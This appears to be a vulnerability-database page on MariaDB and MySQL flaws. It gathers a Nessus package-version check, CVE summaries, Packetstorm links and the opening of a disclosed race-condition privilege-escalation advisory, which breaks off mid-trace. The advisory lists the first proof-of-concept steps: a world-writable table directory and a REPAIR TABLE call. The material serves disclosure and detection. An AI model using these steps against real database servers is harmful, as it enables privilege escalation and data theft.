reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-tools-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"mariadb-tools-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"1", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-tools-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"mariadb-tools-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLES12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient_r18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"libmysqlclient_r18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"1", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient18-debuginfo-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient_r18-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"libmysqlclient_r18-32bit-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-client-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-client-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-debuginfo-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-debugsource-10.0.29-22.1")) flag++; if (rpm_check(release:"SLED12", sp:"2", cpu:"x86_64", reference:"mariadb-errormessages-10.0.29-22.1")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "mariadb"); }
NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-201702-18.NASL description The remote host is affected by the vulnerability described in GLSA-201702-18 (MariaDB: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in MariaDB. Please review the CVE identifiers referenced below for details. Impact : An attacker could possibly escalate privileges, gain access to critical data or complete access to all MariaDB Server accessible data, or cause a Denial of Service condition via unspecified vectors. Workaround : There is no known workaround at this time. last seen 2020-06-01 modified 2020-06-02 plugin id 97261 published 2017-02-21 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97261 title GLSA-201702-18 : MariaDB: Multiple vulnerabilities NASL family SuSE Local Security Checks NASL id SUSE_SU-2017-0411-1.NASL description This mariadb version update to 10.0.29 fixes the following issues : - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: unrestricted mysqld_safe last seen 2020-06-01 modified 2020-06-02 plugin id 97063 published 2017-02-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97063 title SUSE SLES12 Security Update : mariadb (SUSE-SU-2017:0411-1) NASL family Red Hat Local Security Checks NASL id REDHAT-RHSA-2017-2192.NASL description An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933) Security Fix(es) : * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 102152 published 2017-08-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102152 title RHEL 7 : mariadb (RHSA-2017:2192) NASL family Databases NASL id MARIADB_5_5_54.NASL description The version of MariaDB running on the remote host is 5.5.x prior to 5.5.54. It is, therefore, affected by multiple vulnerabilities : - A privilege escalation vulnerability exists in scripts/mysqld_safe.sh due to improper handling of arguments to malloc-lib. A local attacker can exploit this, via a symlink attack on error logs, to gain root privileges. (CVE-2016-6664) - A denial of service vulnerability exists in sql/item_subselect.cc due to improper handling of queries from the select/unit tree. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the check_well_formed_result() function in sql/item.cc due to improper handling of row validation. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the parse_filter_rule() function in sql/rpl_filter.cc that is triggered during the clearing of wildcards. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the safe_charset_converter() function in sql/item.cc due to improper handling of a specially crafted subselect query item. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the st_select_lex::is_merged_child_of() function in sql/sql_lex.cc due to improper handling of merged views or derived tables. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in sql/item.cc due to improper handling of a specially crafted subquery. An authenticated, remote attacker can exploit this to crash the database. last seen 2020-06-01 modified 2020-06-02 plugin id 96489 published 2017-01-13 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96489 title MariaDB 5.5.x < 5.5.54 Multiple Vulnerabilities NASL family Debian Local Security Checks NASL id DEBIAN_DSA-3770.NASL description Several issues have been discovered in the MariaDB database server. The vulnerabilities are addressed by upgrading MariaDB to the new upstream version 10.0.29. Please see the MariaDB 10.0 Release Notes for further details : - https://mariadb.com/kb/en/mariadb/mariadb-10029-release- notes/ last seen 2020-06-01 modified 2020-06-02 plugin id 96669 published 2017-01-23 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96669 title Debian DSA-3770-1 : mariadb-10.0 - security update NASL family Huawei Local Security Checks NASL id EULEROS_SA-2017-1169.NASL description According to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) - A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) - Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) - It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) - Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) - A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) - This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-09-08 plugin id 103007 published 2017-09-08 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103007 title EulerOS 2.0 SP1 : mariadb (EulerOS-SA-2017-1169) NASL family SuSE Local Security Checks NASL id SUSE_SU-2017-0408-1.NASL description This mysql version update to 5.5.54 fixes the following issues : - CVE-2017-3318: Unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: Unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3313: Unspecified vulnerability affecting the MyISAM component (bsc#1020890) - CVE-2017-3312: Insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: Unrestricted mysqld_safe last seen 2020-06-01 modified 2020-06-02 plugin id 97046 published 2017-02-07 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97046 title SUSE SLES11 Security Update : mysql (SUSE-SU-2017:0408-1) NASL family Databases NASL id MARIADB_5_5_52.NASL description The version of MariaDB running on the remote host is 5.5.x prior to 5.5.52. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629) - A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283) - A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition. - An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition. last seen 2020-06-01 modified 2020-06-02 plugin id 95633 published 2016-12-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95633 title MariaDB 5.5.x < 5.5.52 Multiple Vulnerabilities NASL family Databases NASL id MARIADB_10_1_18.NASL description The version of MariaDB running on the remote host is 10.1.x prior to 10.1.18. It is, therefore, affected by multiple vulnerabilities : - An unspecified flaw exists in the Optimizer subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-3492) - An unspecified flaw exists in the MyISAM subcomponent that allows a local attacker to gain elevated privileges. (CVE-2016-5616) - An unspecified flaw exists in the DML subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5624) - An unspecified flaw exists in the GIS subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-5626) - An unspecified flaw exists in the Federated subcomponent that allows an authenticated remote attacker to cause a denial of service condition. (CVE-2016-5629) - A security bypass vulnerability exists that allows an authenticated, remote attacker to bypass file access restrictions and create the /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. (CVE-2016-6663) - An unspecified flaw exists in the Types subcomponent that allows an authenticated, remote attacker to cause a denial of service condition. (CVE-2016-8283) - A flaw exists in the Item_field::fix_after_pullout() function within file sql/item.cc when handling a prepared statement with conversion to semi-join. An authenticated, remote attacker can exploit this to cause a denial of service condition. - An assertion flaw exists in the mysql_admin_table() function within file sql/sql_admin.cc when handling the re-execution of certain ANALYZE TABLE prepared statements. An authenticated, remote attacker can exploit this to cause a denial of service condition. last seen 2020-06-01 modified 2020-06-02 plugin id 95632 published 2016-12-08 reporter This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/95632 title MariaDB 10.1.x < 10.1.18 Multiple Vulnerabilities NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_22373C43D72811E6A9A5B499BAEBFEAF.NASL description The MySQL project reports : - CVE-2016-3492: Remote security vulnerability in last seen 2020-06-01 modified 2020-06-02 plugin id 96510 published 2017-01-16 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96510 title FreeBSD : MySQL -- multiple vulnerabilities (22373c43-d728-11e6-a9a5-b499baebfeaf) NASL family SuSE Local Security Checks NASL id OPENSUSE-2017-257.NASL description This mariadb version update to 10.0.29 fixes the following issues : - CVE-2017-3318: unspecified vulnerability affecting Error Handling (bsc#1020896) - CVE-2017-3317: unspecified vulnerability affecting Logging (bsc#1020894) - CVE-2017-3312: insecure error log file handling in mysqld_safe, incomplete CVE-2016-6664 (bsc#1020873) - CVE-2017-3291: unrestricted mysqld_safe last seen 2020-06-05 modified 2017-02-21 plugin id 97277 published 2017-02-21 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/97277 title openSUSE Security Update : mariadb (openSUSE-2017-257) NASL family Databases NASL id MARIADB_10_0_29.NASL description The version of MariaDB running on the remote host is 10.0.x prior to 10.0.29. It is, therefore, affected by multiple vulnerabilities : - A privilege escalation vulnerability exists in scripts/mysqld_safe.sh due to improper handling of arguments to malloc-lib. A local attacker can exploit this, via a symlink attack on error logs, to gain root privileges. (CVE-2016-6664) - A denial of service vulnerability exists in the check_duplicate_key() function due to improper handling of error messages. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the destroy() function in sql/sql_select.cc due to improper handling of a specially crafted query. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the date_add_interval() function in sql/sql_time.cc due to improper handling of INTERVAL arguments. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in sql/item_subselect.cc due to improper handling of queries from the select/unit tree. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the check_well_formed_result() function in sql/item.cc due to improper handling of row validation. An authenticated, remote attacker can exploit this to crash the database. - A denial of service vulnerability exists in the safe_charset_converter() function in sql/item.cc due to improper handling of a specially crafted subselect query item. An authenticated, remote attacker can exploit this to crash the database. last seen 2020-06-01 modified 2020-06-02 plugin id 96486 published 2017-01-13 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/96486 title MariaDB 10.0.x < 10.0.29 Multiple Vulnerabilities NASL family CentOS Local Security Checks NASL id CENTOS_RHSA-2017-2192.NASL description An update for mariadb is now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL. The following packages have been upgraded to a later upstream version: mariadb (5.5.56). (BZ#1458933) Security Fix(es) : * It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) * A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) * Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) * It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) * Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) * A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) * This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Additional Changes : For detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section. last seen 2020-06-01 modified 2020-06-02 plugin id 102755 published 2017-08-25 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102755 title CentOS 7 : mariadb (CESA-2017:2192) NASL family Huawei Local Security Checks NASL id EULEROS_SA-2017-1170.NASL description According to the versions of the mariadb packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) - A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) - Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) - It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) - Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) - A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) - This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues. last seen 2020-05-06 modified 2017-09-08 plugin id 103008 published 2017-09-08 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/103008 title EulerOS 2.0 SP2 : mariadb (EulerOS-SA-2017-1170) NASL family Scientific Linux Local Security Checks NASL id SL_20170801_MARIADB_ON_SL7_X.NASL description The following packages have been upgraded to a later upstream version: mariadb (5.5.56). Security Fix(es) : - It was discovered that the mysql and mysqldump tools did not correctly handle database and table names containing newline characters. A database user with privileges to create databases or tables could cause the mysql command to execute arbitrary shell or SQL commands while restoring database backup created using the mysqldump tool. (CVE-2016-5483, CVE-2017-3600) - A flaw was found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use this flaw to escalate their privileges to root. (CVE-2016-5617, CVE-2016-6664) - Multiple flaws were found in the way the MySQL init script handled initialization of the database data directory and permission setting on the error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3265) - It was discovered that the mysqld_safe script honored the ledir option value set in a MySQL configuration file. A user able to modify one of the MySQL configuration files could use this flaw to escalate their privileges to root. (CVE-2017-3291) - Multiple flaws were found in the way the mysqld_safe script handled creation of error log file. The mysql operating system user could use these flaws to escalate their privileges to root. (CVE-2017-3312) - A flaw was found in the way MySQL client library (libmysqlclient) handled prepared statements when server connection was lost. A malicious server or a man-in-the-middle attacker could possibly use this flaw to crash an application using libmysqlclient. (CVE-2017-3302) (CVE-2017-3238, CVE-2017-3243, CVE-2017-3244, CVE-2017-3258, CVE-2017-3308, CVE-2017-3309, CVE-2017-3313, CVE-2017-3317, CVE-2017-3318, CVE-2017-3453, CVE-2017-3456, CVE-2017-3464) last seen 2020-03-18 modified 2017-08-22 plugin id 102648 published 2017-08-22 reporter This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102648 title Scientific Linux Security Update : mariadb on SL7.x x86_64 (20170801)
Packetstorm
data source https://packetstormsecurity.com/files/download/139491/mysql-chowned.txt id PACKETSTORM:139491 last seen 2016-12-05 published 2016-11-02 reporter Dawid Golunski source https://packetstormsecurity.com/files/139491/MySQL-MariaDB-PerconaDB-Root-Privilege-Escalation.html title MySQL / MariaDB / PerconaDB Root Privilege Escalation data source https://packetstormsecurity.com/files/download/139476/db-escalate.txt id PACKETSTORM:139476 last seen 2016-12-05 published 2016-11-02 reporter Dawid Golunski source https://packetstormsecurity.com/files/139476/MySQL-MariaDB-PerconaDB-Privilege-Escalation-Race-Condition.html title MySQL / MariaDB / PerconaDB Privilege Escalation / Race Condition
Redhat
advisories |
| ||||||||||||||||||||
rpms |
|
Seebug
bulletinFamily exploit description - Release date: 01.11.2016 - Discovered by: Dawid Golunski I. VULNERABILITY ------------------------- MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition MariaDB < 5.5.52 < 10.1.18 < 10.0.28 MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 II. BACKGROUND ------------------------- MySQL: "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." http://www.mysql.com/products/ http://www.mysql.com/why-mysql/ -- MariaDB: "MariaDB is one of the most popular database servers in the world. It’s made by the original developers of MySQL and guaranteed to stay open source. Notable users include Wikipedia, WordPress.com and Google. MariaDB turns data into structured information in a wide array of applications, ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of storage engines, plugins and many other tools make it very versatile for a wide variety of use cases." https://mariadb.org/about/ -- PerconaDB: "Percona Server for MySQL® is a free, fully compatible, enhanced, open source drop-in replacement for MySQL that provides superior performance, scalability and instrumentation. With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support for extremely high-performance hardware delivers excellent performance and reliability." https://www.percona.com/software/mysql-database/percona-server III. INTRODUCTION ------------------------- An independent research has revealed a race condition vulnerability which is present in MySQl, MariaDB and PerconaDB databases. The vulnerability can allow a local system user with access to the affected database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) to escalate their privileges and execute arbitrary code as the database system user (typically 'mysql'). Successful exploitation would allow an attacker to gain access to all of the databases stored on the affected database server. The obtained level of access upon the exploitation, could be chained with the other privilege escalation vulnerabilities discovered by the author of this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges from mysql user to root user and thus allow attackers to fully compromise the target server. IV. DESCRIPTION ------------------------- Table locations ~~~~~~~~~~~~~~~~~~ MySQL-based databases allow users with CREATE table privilege to optionally specify a disk path of the directory where the table will be stored via a DATA DIRECTORY parameter in the CREATE statement. Users who have access to a database account with CREATE grant could create a table under a directory that they can control. For example: attacker@debian:~$ mkdir /tmp/disktable attacker@debian:~$ chmod 777 /tmp/disktable/ attacker@debian:~$ ls -ld /tmp/disktable/ drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ A user could then place a table within the directory with the following SQL statement: mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; which would result in creating the following table file: attacker@debian:~$ ls -l /tmp/disktable/ total 0 -rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD Race Condition ~~~~~~~~~~~~~~~~~~ Observing file operations performed on the table stored within the directory, it was discovered that REPAIR TABLE SQL statement which is available to low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe operations on temporary files created during the table repair process. Executing the statement: ``` mysql> REPAIR TABLE `poctab1`; +----------------+--------+----------+----------+ | Table | Op | Msg_type | Msg_text | +----------------+--------+----------+----------+ | testdb.poctab1 | repair | status | OK | +----------------+--------+----------+----------+ would result in execution of the following system calls: [pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 [pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65 [pid 1463] 